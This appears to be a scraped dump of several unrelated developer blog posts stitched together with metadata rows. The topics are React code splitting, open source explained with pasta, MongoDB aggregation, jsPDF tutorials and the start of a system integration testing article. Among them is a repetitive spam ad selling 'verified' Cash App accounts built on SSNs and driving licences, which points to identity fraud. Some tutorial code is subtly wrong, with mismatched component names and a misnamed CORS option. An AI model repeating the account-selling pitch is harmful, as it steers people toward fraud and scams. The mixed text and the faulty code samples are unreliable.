**Before Code Splitting**
Without code splitting, your entire application is bundled into a single file. **This means that even if a user only visits one page or uses one component, they must download the entire application bundle. This can lead to:**
- Longer Initial Load Time: Users have to wait longer for the initial load.
- Poor Performance on Slow Networks: Users with slower internet connections will experience significant delays.
- Unnecessary Data Transfer: Users download components and code they may never use.
**After Code Splitting**
With code splitting, your application is divided into smaller chunks that are loaded on demand. This results in:
- Faster Initial Load Time: Only the necessary chunks are loaded initially, speeding up the initial load.
- Improved Performance: Users experience faster load times and smoother interactions.
- Efficient Data Transfer: Only the required code is downloaded, reducing data usage.
## JavaScript Implementation
### Creating a Loadable Component
First, create a `Loadable` component that will handle the loading state while your actual component is being loaded.
```JavaScript
// src/components/Loadable.js
import { Suspense } from "react";
import Loader from "./Loader"; // Assume you have a Loader component
const Loadable = (Component) => (props) => {
return (
<Suspense fallback={<Loader />}>
<Component {...props} />
</Suspense>
);
};
export default Loadable;
```
## Example Usage with a Heavy Component
Let's simulate a heavy component with some intensive computation to demonstrate the benefits of code splitting.
```javascript
// src/components/HeavyComponent.js
import React, { useEffect, useState } from "react";
const HeavyComponent = () => {
const [result, setResult] = useState(0);
useEffect(() => {
let sum = 0;
for (let i = 0; i < 1e7; i++) {
sum += i;
}
setResult(sum);
}, []);
return (
<div>
<h1>Heavy Component</h1>
<p>Result of heavy computation: {result}</p>
</div>
);
};
export default HeavyComponent;
```
lets now import the heavy component into our main view
```javascript
// src/App.js
import React from "react";
import Loadable from "./Loadable";
// use the Loadable component to asynchronously load the HeavyComponent
const heavyLoadableComp = Loadable(React.lazy(() => import("./HeavyComponent")));
const App = () => {
return (
<div>
<h1>Welcome to My App</h1>
<LoadableHeavyComponent />
</div>
);
};
export default App;
```
## TypeScript Implementation
### Creating a Loadable Component in TypeScript
To ensure type safety and leverage TypeScript's features, we can rewrite the Loadable component.
```javascript
// src/components/Loadable.tsx
import React, { Suspense, ReactElement } from "react";
import Loader from "./Loader";
const Loadable = <P extends object>(Component: React.ComponentType<P>): React.FC<P> => (props: P): ReactElement => {
return (
<Suspense fallback={<Loader />}>
<Component {...props} />
</Suspense>
);
};
export default Loadable;
```
## Example Usage with a Heavy Component in TypeScript
```javascript
// src/App.tsx
import React from "react";
// use the Loadable component to asynchronously load the HeavyComponent
const heavyLoadableComp = Loadable(React.lazy(() => import("./HeavyComponent")));
const App: React.FC = () => {
return (
<div>
<h1>Welcome to My App</h1>
<LoadableHeavyComponent />
</div>
);
};
export default App;
```
Code splitting is a powerful technique to optimize your React applications. By splitting your code into smaller chunks and loading them on demand, you can significantly improve the performance of your application, especially as it grows. Now go make a better react website!
if you like this simple guide, pls give some love ❤️ and even add to this guide
| codewithjohnson |
1,881,426 | Open Source Software Explained like it is Pasta | Open source, open source. What is open-source software? My dear mentor at HOTOSM, Kshitij explained... | 0 | 2024-06-08T16:19:46 | https://dev.to/nifedara/open-source-software-explained-like-it-is-pasta-5cog | opensource, proprietary, hotosm, internship | Open source, open source. What is open-source software?
My dear mentor at [HOTOSM](https://dev.to/nifedara/oluwanifemis-day-1-of-forever-536l), Kshitij explained this to me using a food I like, which is pasta and I would like to share it.
Open-source software is any software whose make-up(source code) is available for anyone to see and contribute. Like pasta, anyone can make it. You can make it however you like. You can add different ingredients to it which can be likened to adding features to open source software.
Being open-source doesn’t mean free. Open-source software is not synonymous with free software. Let’s hit it home with pasta. That anyone can make pasta doesn’t mean that pasta will be free. Cooking pasta costs me effort and resources, and I could charge for that. Likewise, it is the same for software, it could be open-source but not free.
If however, I have a restaurant where anyone can come in to help cook pasta to distribute freely to people, that is what you will call Free and Open-source pasta. This is mostly the case with most open-source projects.
Do a quick check. Check if your favourite applications are open-source and appreciate the community behind them.
How about proprietary software? Think about your favourite restaurant to eat pasta. I assume you don’t know how to make it taste like theirs, as you don’t have their recipe. You can’t walk in there to add ingredients to it while they cook because you are not a chef at the restaurant. That is the opposite of open-source. You can’t access the make-up(source code) and you can not add to it. Proprietary software can either be paid or free. Just as your favourite restaurant can either charge you for their pasta or give it to you for free (*winks*).
> I hope this short explanation was worth your read. Let me know.
_Cover image <a href="http://www.freepik.com">Designed by slidesgo / Freepik</a>_
| nifedara |
1,864,366 | MongoDB Aggregation, is really powerful | I was working with my backend colleague on a particular project, going through his code, I was amazed... | 0 | 2024-06-08T16:18:56 | https://dev.to/codewithonye/mongodb-aggregation-is-really-powerful-3m3g | backend, database, mongodb, node |
I was working with my backend colleague on a particular project, going through his code, I was amazed by how clean and simple the codebase was. I was literally looking for the queries behind some of the implementations he did, the code was really so simple and clean. I was like "how did he do this?" until one very good day he told me to read about MongoDB Aggregation.
After reading and understanding how MongoDB aggregation works, I was really amazed, so I decided to write an article about it.
Before I get started, here is what you will be familiar with after reading this article:
- **What is aggregation in MongoDB**
- **How does the MongoDB aggregation pipeline work**
- **MongoDB aggregation pipeline syntax**
- **Practical example of MongoDB aggregation**
### What is aggregation in mongoDB
Aggregation is a way of processing a large number of documents in a collection by means of passing them through stages, and these stages are called a **Pipeline**. These stages in a pipeline can filter, sort, group, reshape, and modify documents, and do much more.
> #### Key Point🎯
- A pipeline can have one or more stages.
- The order of these stages is important.
- This aggregation happens within the database engine, enabling it to handle large datasets efficiently.
### How Does the MongoDB Aggregation Pipeline Work?
Here is a diagram to illustrate a typical MongoDB aggregation pipeline:

_Image Credit: studio3t_
Let's understand each of the stages and what they do:
- `$match` stage - It filters the documents we need to work with, those that fit our needs.
- `$group` stage - this is where the aggregation happens. It groups documents by a specified key to perform calculations like sum, average, max, min, and so on.
- `$sort` stage - this sorts the documents in ascending or descending order based on specified fields.
There are many more stages; I will talk more about some of the others in the example below.
> #### Key Point🎯
- Each stage acts upon the results of the previous stage.
- There can be one or more stages in a pipeline, depending on what you are planning to achieve.
Now that we understand how the pipeline works, let's take a look at the syntax.
### MongoDB Aggregate Pipeline Syntax
This is an example of how to build an aggregation query:
`db.collectionName.aggregate(pipeline, options)`
- where collectionName – is the name of a collection,
- pipeline – is an array that contains the aggregation stages,
- options – optional parameters for the aggregation
This is an example of the aggregation pipeline syntax:
```
pipeline = [
{ $match : { … } },
{ $group : { … } },
{ $sort : { … } }
]
```
Let's now see a practical example of how MongoDB aggregation works..
### Practical Example Using MongoDB Aggregation
In this example, I will be using a dummy JSON data of electrical payloads coming from single-phase and three-phase IoT devices. Check my [gitHub] (https://github.com/code-with-onye/electric-iot-payload/tree/main) to copy the complete Json data.
The goal of this aggregation is to retrieve the average voltage, current, and power values for each hour of the day, specifically for devices with a "deviceType" of "singlePhase". The output will be a set of documents containing the hour of the day and the corresponding rounded average values for voltage, current, and power.
This how we approach it.
**Step 1:** Filter data by device type
```js
db.electricalData.aggregate([
{ $match: { deviceType: "singlePhase" } }
])
```
The $match stage filters the data to include only documents where the deviceType is "singlePhase".
**Step 2:** Group data by hour and calculate averages
```js
db.electricalData.aggregate([
{ $match: { deviceType: "singlePhase" } },
{
$group: {
_id: { hour: { $hour: "$timestamp" } },
avgVoltage: { $avg: "$voltage" },
avgCurrent: { $avg: "$current" },
avgPower: { $avg: "$power" }
}
}
])
```
The $group stage groups the data by the hour of the timestamp and calculates the average voltage, current, and power for each hour.
Step 3: Sort data by hour
```js
db.electricalData.aggregate([
{ $match: { deviceType: "singlePhase" } },
{
$group: {
_id: { hour: { $hour: "$timestamp" } },
avgVoltage: { $avg: "$voltage" },
avgCurrent: { $avg: "$current" },
avgPower: { $avg: "$power" }
}
},
{ $sort: { "_id.hour": 1 } }
])
```
The $sort stage sorts the data by the hour in ascending order.
Step 4: Project and format the output
```js
db.electricalData.aggregate([
{ $match: { deviceType: "singlePhase" } },
{
$group: {
_id: { hour: { $hour: "$timestamp" } },
avgVoltage: { $avg: "$voltage" },
avgCurrent: { $avg: "$current" },
avgPower: { $avg: "$power" }
}
},
{ $sort: { "_id.hour": 1 } },
{
$project: {
_id: 0,
hour: "$_id.hour",
avgVoltage: { $round: ["$avgVoltage", 2] },
avgCurrent: { $round: ["$avgCurrent", 2] },
avgPower: { $round: ["$avgPower", 2] }
}
}
])
```
The $project stage reshapes the output by excluding the _id field, renaming the _id.hour field to hour, and rounding the average voltage, current, and power values to two decimal places.
This is just a simple example of what is possible using MongoDB Aggregation. For more MongoDB aggregation operators, [Check studio3t](https://studio3t.com/knowledge-base/articles/mongodb-aggregation-operators-stages/)
### Conclusion
MongoDB Aggregation is a powerful and flexible tool that can streamline data processing workflows, reduce the complexity of application code, and enable an easy way to extract valuable insights from data more efficiently. Whether is working with large amounts of data, complex data structures, or any other type of data, MongoDB Aggregation offers a robust set of capabilities to help harness the full potential of your data.
| codewithonye |
1,881,429 | Generating A PDF From A Div Using The JsPDF Library | by Adhing'a Fredrick Thousands, if not millions, of people on the internet need access to receipts,... | 0 | 2024-06-08T16:17:04 | https://blog.openreplay.com/generating-a-pdf-from-a-div-using-the-jspdf-library/ |
by [Adhing'a Fredrick](https://blog.openreplay.com/authors/adhing'a-fredrick)
<blockquote><em>
Thousands, if not millions, of people on the internet need access to receipts, reports, statements, and many other files daily. This makes generating PDF files a common task in web applications because PDFs provide a convenient way to format and present information in a consistent, cross-platform manner. In this article, we'll see how to generate PDFs on the client side by using the jsPDF library.
</em></blockquote>
<div style="background-color:#efefef; border-radius:8px; padding:10px; display:block;">
<hr/>
<h3><em>Session Replay for Developers</em></h3>
<p><em>Uncover frustrations, understand bugs and fix slowdowns like never before with <strong><a href="https://github.com/openreplay/openreplay" target="_blank">OpenReplay</a></strong> — an open-source session replay suite for developers. It can be <strong>self-hosted</strong> in minutes, giving you complete control over your customer data.</em></p>
<img alt="OpenReplay" style="margin-top:5px; margin-bottom:5px;" width="768" height="400" src="https://raw.githubusercontent.com/openreplay/openreplay/main/static/openreplay-git-hero.svg" class="astro-UXNKDZ4E" loading="lazy" decoding="async">
<p><em>Happy debugging! <a href="https://openreplay.com" target="_blank">Try using OpenReplay today.</a></em><p>
<hr/>
</div>
[jsPDF](https://www.npmjs.com/package/jspdf) is a JavaScript library specifically built for client-side PDF generation. Its key features include:
- Client-side operation: Generates PDFs without server-side dependencies.
- Customization: Offers control over PDF layout, styling, and content.
- Ease of use: A straightforward API for creating PDFs from HTML.
## Installation and setup of jsPDF in a web project
To start using jsPDF, you can install it using two options:
1. **CDN**: Include the library directly in your HTML head tag using a CDN link as follows:
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/jspdf/2.5.1/jspdf.umd.min.js"></script>
```
2. **Package Manager (npm or yarn)**: Install jsPDF as a project dependency using the command below:
```bash
npm install jspdf
# or
yarn add jspdf
```
## Setting up a simple HTML structure to convert into a PDF
For this tutorial, we will write a simple HTML invoice code that we will use to demonstrate how jsPDF works.
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Invoice Receipt</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
</head>
<body>
<div class="container mt-5">
<div class="row">
<div class="col-md-8 offset-md-2">
<div class="card">
<div class="card-header bg-primary text-white">
<h3 class="mb-0 text-center" >Invoice Receipt</h3>
</div>
<div class="card-body">
<div class="row mb-3">
<div class="col-md-6">
<img src="https://i.imgur.com/rSVYXhJ.png" alt="Company Logo" class="img-fluid">
</div>
<div class="col-md-6 text-right">
<h5>E-Commerce Store</h5>
<p>123 Main Street<br>Anytown, USA 12345</p>
<p>Phone: (123) 456-7890</p>
<p>Email: info@ecommercestore.com</p>
</div>
</div>
<div class="row mb-3">
<div class="col-md-6">
<h5>Billed To:</h5>
<p>John Doe<br>456 Oak Street<br>Anytown, USA 12345</p>
</div>
<div class="col-md-6 text-right">
<h5>Invoice #: 1234</h5>
<p>Invoice Date: March 20, 2024</p>
</div>
</div>
<table class="table table-striped">
<thead>
<tr>
<th>Product</th>
<th>Price</th>
<th>Quantity</th>
<th>Total</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<img src="https://i.imgur.com/qMRYgDi.png" alt="Product Image" class="img-fluid mr-2" width="70" height="50">
Hisense TV 55"
</td>
<td>$599.99</td>
<td>1</td>
<td>$599.99</td>
</tr>
</tbody>
<tfoot>
<tr>
<th colspan="3" class="text-right">Subtotal:</th>
<td>$599.99</td>
</tr>
<tr>
<th colspan="3" class="text-right">Shipping:</th>
<td>$10.00</td>
</tr>
<tr>
<th colspan="3" class="text-right">Total:</th>
<td>$609.99</td>
</tr>
</tfoot>
</table>
</div>
<div class="card-footer text-muted text-center">
Thank you!
</div>
</div>
</div>
</div>
<a href="javascript:void(0)" class="btn btn-primary btn-block mt-3 btn-download">Download PDF</a>
</div>
</body>
</html>
```
The expected output:

We will be generating a PDF file from the `receipt` div element.
<CTA_Middle_Programming />
## Step-by-step guide on using jsPDF to convert HTML content into a PDF
To convert the `receipt` div to HTML, we will add the jsPDF CDN link in the head tag of our HTML page:
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/jspdf/2.5.1/jspdf.umd.min.js"></script>
```
We will use jsPDF version 2.5.1 together with [html2canvas](https://html2canvas.hertzen.com/) and [html2pdf](https://ekoopmans.github.io/html2pdf.js/) libraries to aid in the PDF generation.
**html2canvas** is a JavaScript library that enables developers to take screenshots of web pages and convert them into a canvas element. It is mostly used in tasks like PDF generation since it captures the visual design of an HTML element and then converts it into an image that can be included in the PDF.
**html2pdf** is a JavaScript library that combines the functionality of jsPDF and html2canvas to provide a comprehensive solution for generating PDFs from HTML content. It simplifies the process of creating PDFs by handling the conversion of HTML to a PDF format, including the inclusion of images, tables, and other elements.
```html
<script type='text/javascript' src='https://html2canvas.hertzen.com/dist/html2canvas.js'></script>
<script type='text/javascript' src= "https://html2canvas.hertzen.com/dist/html2canvas.min.js"></script>
<script type='text/javascript' src="https://cdnjs.cloudflare.com/ajax/libs/html2pdf.js/0.8.0/html2pdf.min.js" integrity="sha512-2ziYH4Qk1Cs0McWDB9jfPYzvRgxC8Cj62BUC2fhwrP/sUBkkfjYk3142xTKyuCyGWL4ooW8wWOzMTX86X1xe3Q==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
```
> **NOTE**: If the CDN links fail to work, download these [js files](https://github.com/FREDERICO23/html2pdf_js.git) and run them locally as follows:
```html
<script src="js/jspdf.debug.js"></script>
<script src="js/html2canvas.min.js"></script>
<script src="js/html2pdf.min.js"></script>
```
Next, we will write javascript code to download the PDF using the jsPDF library we previously setup using the instructions below:
1. Set up an object called `options` that contains various configuration settings for the HTML-to-PDF conversion process.
```javascript
const options = {
margin: 0.5,
filename: 'invoice_receipt.pdf',
image: {
type: 'jpeg',
quality: 500
},
html2canvas: {
scale: 1
},
jsPDF: {
unit: 'in',
format: 'letter',
orientation: 'portrait'
}
}
```
Here's what each property does:
- `margin: 0.5:` Sets the margin around the PDF document to 0.5 inches.
- `filename: 'receipt.pdf'`: Specifies the filename of the generated PDF file.
- `image: { type: 'jpeg', quality: 500 }`: Configures the image type and quality for any images included in the PDF.
- `html2canvas: { scale: 1 }`: Sets the scale factor for rendering the HTML content to a canvas element.
- `jsPDF: { unit: 'in', format: 'letter', orientation: 'portrait' }`: Configures the settings for the generated PDF file, including the measurement unit ('in' for inches), paper format ('letter'), and orientation ('portrait').
2. Next, listen for a click event on an element with the class `btn-download`.
```javascript
$('.btn-download').click(function(e) {
e.preventDefault();
const element = document.getElementById('receipt');
html2pdf().from(element).set(options).save();
});
```
When the click event occurs, it performs the following actions:
- `e.preventDefault();`: Prevents the default behavior of the click event (e.g., if the button is a link, it prevents navigation).
- `const element = document.getElementById('receipt');`: Retrieves a reference to an HTML element with the `receipt` ID.
- `html2pdf().from(element).set(options).save();`: Uses the html2pdf library to generate a PDF from the element. It applies the options object to configure the PDF generation process and then saves the PDF file.
3. Next, write a function, `printDiv`, to print the contents of a specific HTML element directly from the browser. It takes a `divName` parameter, which is the ID of the HTML element to print.
```javascript
function printDiv(divName) {
var printContents = document.getElementById(divName).innerHTML;
var originalContents = document.body.innerHTML;
document.body.innerHTML = printContents;
window.print();
document.body.innerHTML = originalContents;
}
```
Here's how it works:
- `var printContents = document.getElementById(divName).innerHTML;`: Retrieves the inner HTML content of the specified element.
- `var originalContents = document.body.innerHTML;`: Stores the current HTML content of the entire document body.
- `document.body.innerHTML = printContents;`: Sets the document body's HTML content to the content of the specified element.
- `window.print();`: Triggers the browser's print dialog, allowing the user to print the current document.
- `document.body.innerHTML = originalContents;`: Restores the original HTML content of the document body after printing.
After adding the javascript code, download the invoice-receipt PDF file using the **Download PDF** link at the top right of the page.
Expected Output :

## Integrating images into the PDF
As you will see in the output above, there are no images on the downloaded PDF file.
To include the images on the HTML page into the PDF file, we will add some settings to the html2canvas setting options as shown below:
```javascript
html2canvas: {
scale: 2, // Increase scale to improve image quality
sectors: true, // Enable CORS for loading cross-origin images
allowTaint: true, // Allow rendering of tainted images
logging: true // Enable logging for debugging
},
```
Redownload the file again and confirm if the downloaded has images.
Expected Output:

## Conclusion
In this article, we have learned to use jsPDF and other libraries like html2canvas and html2pdf to generate PDFs from a web page div. It is not only easy to customize but also very flexible for a lot of use cases.
Now, you can comfortably build your PDF download features on the client side of your projects.
| asayerio_techblog | |
1,881,428 | Day 12 of my progress as a vue dev | About today Today was one of the most productive day I had in a while, I followed my routine and... | 0 | 2024-06-08T16:16:24 | https://dev.to/zain725342/day-12-of-my-progress-as-a-vue-dev-531h | webdev, vue, typescript, tailwindcss | **About today**
Today was one of the most productive day I had in a while, I followed my routine and ended up saving a lot of time which I spent developing. Also, today I ended up deciding on the visual approach that I want to take for my DSA visualizer and the direction I want it to go, so it is starting to take shape gradually which I'm happy about.
**What's next?**
I will be wrapping up this project with few more improvements in the coming days, then I have some ideas for other so I might work on those or just dive into laravel and implement it on my existing projects that are using local storage, and there are high chances that I will be going down this route.
**Improvements required**
Routine wise I feel like I still need work, also I really need to start getting freelance projects as they will help me grow and work on problems I think on my own. Other than that, my project is headed in the right direction, but there is always more room for improvement so I'll look for ways to make it better before finalizing it and moving on.
Wish me luck! | zain725342 |
1,881,427 | Buy verified cash app account | https://dmhelpshop.com/product/buy-verified-cash-app-account/ Buy verified cash app account Cash... | 0 | 2024-06-08T16:16:16 | https://dev.to/ralsopew/buy-verified-cash-app-account-50hj | webdev, javascript, beginners, programming | ERROR: type should be string, got "https://dmhelpshop.com/product/buy-verified-cash-app-account/\n\n\n\n\nBuy verified cash app account\nCash app has emerged as a dominant force in the realm of mobile banking within the USA, offering unparalleled convenience for digital money transfers, deposits, and trading. As the foremost provider of fully verified cash app accounts, we take pride in our ability to deliver accounts with substantial limits. Bitcoin enablement, and an unmatched level of security.\n\nOur commitment to facilitating seamless transactions and enabling digital currency trades has garnered significant acclaim, as evidenced by the overwhelming response from our satisfied clientele. Those seeking buy verified cash app account with 100% legitimate documentation and unrestricted access need look no further. Get in touch with us promptly to acquire your verified cash app account and take advantage of all the benefits it has to offer.\n\nWhy dmhelpshop is the best place to buy USA cash app accounts?\nIt’s crucial to stay informed about any updates to the platform you’re using. If an update has been released, it’s important to explore alternative options. Contact the platform’s support team to inquire about the status of the cash app service.\n\nClearly communicate your requirements and inquire whether they can meet your needs and provide the buy verified cash app account promptly. If they assure you that they can fulfill your requirements within the specified timeframe, proceed with the verification process using the required documents.\n\nOur account verification process includes the submission of the following documents: [List of specific documents required for verification].\n\nGenuine and activated email verified\nRegistered phone number (USA)\nSelfie verified\nSSN (social security number) verified\nDriving license\nBTC enable or not enable (BTC enable best)\n100% replacement guaranteed\n100% customer satisfaction\nWhen it comes to staying on top of the latest platform updates, it’s crucial to act fast and ensure you’re positioned in the best possible place. If you’re considering a switch, reaching out to the right contacts and inquiring about the status of the buy verified cash app account service update is essential.\n\nClearly communicate your requirements and gauge their commitment to fulfilling them promptly. Once you’ve confirmed their capability, proceed with the verification process using genuine and activated email verification, a registered USA phone number, selfie verification, social security number (SSN) verification, and a valid driving license.\n\nAdditionally, assessing whether BTC enablement is available is advisable, buy verified cash app account, with a preference for this feature. It’s important to note that a 100% replacement guarantee and ensuring 100% customer satisfaction are essential benchmarks in this process.\n\nHow to use the Cash Card to make purchases?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card. Alternatively, you can manually enter the CVV and expiration date. How To Buy Verified Cash App Accounts.\n\nAfter submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a buy verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account.\n\nWhy we suggest to unchanged the Cash App account username?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card.\n\nAlternatively, you can manually enter the CVV and expiration date. After submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account. Purchase Verified Cash App Accounts.\n\nSelecting a username in an app usually comes with the understanding that it cannot be easily changed within the app’s settings or options. This deliberate control is in place to uphold consistency and minimize potential user confusion, especially for those who have added you as a contact using your username. In addition, purchasing a Cash App account with verified genuine documents already linked to the account ensures a reliable and secure transaction experience.\n\n \n\nBuy verified cash app accounts quickly and easily for all your financial needs.\nAs the user base of our platform continues to grow, the significance of verified accounts cannot be overstated for both businesses and individuals seeking to leverage its full range of features. How To Buy Verified Cash App Accounts.\n\nFor entrepreneurs, freelancers, and investors alike, a verified cash app account opens the door to sending, receiving, and withdrawing substantial amounts of money, offering unparalleled convenience and flexibility. Whether you’re conducting business or managing personal finances, the benefits of a verified account are clear, providing a secure and efficient means to transact and manage funds at scale.\n\nWhen it comes to the rising trend of purchasing buy verified cash app account, it’s crucial to tread carefully and opt for reputable providers to steer clear of potential scams and fraudulent activities. How To Buy Verified Cash App Accounts. With numerous providers offering this service at competitive prices, it is paramount to be diligent in selecting a trusted source.\n\nThis article serves as a comprehensive guide, equipping you with the essential knowledge to navigate the process of procuring buy verified cash app account, ensuring that you are well-informed before making any purchasing decisions. Understanding the fundamentals is key, and by following this guide, you’ll be empowered to make informed choices with confidence.\n\n \n\nIs it safe to buy Cash App Verified Accounts?\nCash App, being a prominent peer-to-peer mobile payment application, is widely utilized by numerous individuals for their transactions. However, concerns regarding its safety have arisen, particularly pertaining to the purchase of “verified” accounts through Cash App. This raises questions about the security of Cash App’s verification process.\n\nUnfortunately, the answer is negative, as buying such verified accounts entails risks and is deemed unsafe. Therefore, it is crucial for everyone to exercise caution and be aware of potential vulnerabilities when using Cash App. How To Buy Verified Cash App Accounts.\n\nCash App has emerged as a widely embraced platform for purchasing Instagram Followers using PayPal, catering to a diverse range of users. This convenient application permits individuals possessing a PayPal account to procure authenticated Instagram Followers.\n\nLeveraging the Cash App, users can either opt to procure followers for a predetermined quantity or exercise patience until their account accrues a substantial follower count, subsequently making a bulk purchase. Although the Cash App provides this service, it is crucial to discern between genuine and counterfeit items. If you find yourself in search of counterfeit products such as a Rolex, a Louis Vuitton item, or a Louis Vuitton bag, there are two viable approaches to consider.\n\n \n\nWhy you need to buy verified Cash App accounts personal or business?\nThe Cash App is a versatile digital wallet enabling seamless money transfers among its users. However, it presents a concern as it facilitates transfer to both verified and unverified individuals.\n\nTo address this, the Cash App offers the option to become a verified user, which unlocks a range of advantages. Verified users can enjoy perks such as express payment, immediate issue resolution, and a generous interest-free period of up to two weeks. With its user-friendly interface and enhanced capabilities, the Cash App caters to the needs of a wide audience, ensuring convenient and secure digital transactions for all.\n\nIf you’re a business person seeking additional funds to expand your business, we have a solution for you. Payroll management can often be a challenging task, regardless of whether you’re a small family-run business or a large corporation. How To Buy Verified Cash App Accounts.\n\nImproper payment practices can lead to potential issues with your employees, as they could report you to the government. However, worry not, as we offer a reliable and efficient way to ensure proper payroll management, avoiding any potential complications. Our services provide you with the funds you need without compromising your reputation or legal standing. With our assistance, you can focus on growing your business while maintaining a professional and compliant relationship with your employees. Purchase Verified Cash App Accounts.\n\nA Cash App has emerged as a leading peer-to-peer payment method, catering to a wide range of users. With its seamless functionality, individuals can effortlessly send and receive cash in a matter of seconds, bypassing the need for a traditional bank account or social security number. Buy verified cash app account.\n\nThis accessibility makes it particularly appealing to millennials, addressing a common challenge they face in accessing physical currency. As a result, ACash App has established itself as a preferred choice among diverse audiences, enabling swift and hassle-free transactions for everyone. Purchase Verified Cash App Accounts.\n\n \n\nHow to verify Cash App accounts\nTo ensure the verification of your Cash App account, it is essential to securely store all your required documents in your account. This process includes accurately supplying your date of birth and verifying the US or UK phone number linked to your Cash App account.\n\nAs part of the verification process, you will be asked to submit accurate personal details such as your date of birth, the last four digits of your SSN, and your email address. If additional information is requested by the Cash App community to validate your account, be prepared to provide it promptly. Upon successful verification, you will gain full access to managing your account balance, as well as sending and receiving funds seamlessly. Buy verified cash app account.\n\n \n\nHow cash used for international transaction?\nExperience the seamless convenience of this innovative platform that simplifies money transfers to the level of sending a text message. It effortlessly connects users within the familiar confines of their respective currency regions, primarily in the United States and the United Kingdom.\n\nNo matter if you’re a freelancer seeking to diversify your clientele or a small business eager to enhance market presence, this solution caters to your financial needs efficiently and securely. Embrace a world of unlimited possibilities while staying connected to your currency domain. Buy verified cash app account.\n\nUnderstanding the currency capabilities of your selected payment application is essential in today’s digital landscape, where versatile financial tools are increasingly sought after. In this era of rapid technological advancements, being well-informed about platforms such as Cash App is crucial.\n\nAs we progress into the digital age, the significance of keeping abreast of such services becomes more pronounced, emphasizing the necessity of staying updated with the evolving financial trends and options available. Buy verified cash app account.\n\nOffers and advantage to buy cash app accounts cheap?\nWith Cash App, the possibilities are endless, offering numerous advantages in online marketing, cryptocurrency trading, and mobile banking while ensuring high security. As a top creator of Cash App accounts, our team possesses unparalleled expertise in navigating the platform.\n\nWe deliver accounts with maximum security and unwavering loyalty at competitive prices unmatched by other agencies. Rest assured, you can trust our services without hesitation, as we prioritize your peace of mind and satisfaction above all else.\n\nEnhance your business operations effortlessly by utilizing the Cash App e-wallet for seamless payment processing, money transfers, and various other essential tasks. Amidst a myriad of transaction platforms in existence today, the Cash App e-wallet stands out as a premier choice, offering users a multitude of functions to streamline their financial activities effectively. Buy verified cash app account.\n\nTrustbizs.com stands by the Cash App’s superiority and recommends acquiring your Cash App accounts from this trusted source to optimize your business potential.\n\nHow Customizable are the Payment Options on Cash App for Businesses?\nDiscover the flexible payment options available to businesses on Cash App, enabling a range of customization features to streamline transactions. Business users have the ability to adjust transaction amounts, incorporate tipping options, and leverage robust reporting tools for enhanced financial management.\n\nExplore trustbizs.com to acquire verified Cash App accounts with LD backup at a competitive price, ensuring a secure and efficient payment solution for your business needs. Buy verified cash app account.\n\nDiscover Cash App, an innovative platform ideal for small business owners and entrepreneurs aiming to simplify their financial operations. With its intuitive interface, Cash App empowers businesses to seamlessly receive payments and effectively oversee their finances. Emphasizing customization, this app accommodates a variety of business requirements and preferences, making it a versatile tool for all.\n\nWhere To Buy Verified Cash App Accounts\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nThe Importance Of Verified Cash App Accounts\nIn today’s digital age, the significance of verified Cash App accounts cannot be overstated, as they serve as a cornerstone for secure and trustworthy online transactions.\n\nBy acquiring verified Cash App accounts, users not only establish credibility but also instill the confidence required to participate in financial endeavors with peace of mind, thus solidifying its status as an indispensable asset for individuals navigating the digital marketplace.\n\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nConclusion\nEnhance your online financial transactions with verified Cash App accounts, a secure and convenient option for all individuals. By purchasing these accounts, you can access exclusive features, benefit from higher transaction limits, and enjoy enhanced protection against fraudulent activities. Streamline your financial interactions and experience peace of mind knowing your transactions are secure and efficient with verified Cash App accounts.\n\nChoose a trusted provider when acquiring accounts to guarantee legitimacy and reliability. In an era where Cash App is increasingly favored for financial transactions, possessing a verified account offers users peace of mind and ease in managing their finances. Make informed decisions to safeguard your financial assets and streamline your personal transactions effectively.\n\nContact Us / 24 Hours Reply\nTelegram:dmhelpshop\nWhatsApp: +1 (980) 277-2786\nSkype:dmhelpshop\nEmail:dmhelpshop@gmail.com\n\n\n\n" | ralsopew |
1,881,425 | Understanding System Integration Testing: A Comprehensive Guide | In the realm of software development, ensuring that different system components work seamlessly... | 0 | 2024-06-08T16:06:44 | https://dev.to/keploy/understanding-system-integration-testing-a-comprehensive-guide-5hnj | webdev, javascript, programming, tutorial |

In the realm of software development, ensuring that different system components work seamlessly together is crucial. This is where [System Integration Testing](https://keploy.io/blog/community/all-about-system-integration-testing-in-software-testing) (SIT) comes into play. SIT is a type of testing where individual units or modules of a software application are tested as a combined entity. This article delves into the intricacies of System Integration Testing, exploring its importance, methodologies, best practices, and challenges.
**What is System Integration Testing?**
System Integration Testing (SIT) involves testing the integration of different software modules or components to verify that they function correctly as a complete system. Unlike unit testing, which focuses on individual components, SIT assesses the interactions between these components. The primary goal is to identify any issues that may arise from the integration process, such as interface defects, data inconsistencies, and communication failures.
**Importance of System Integration Testing**
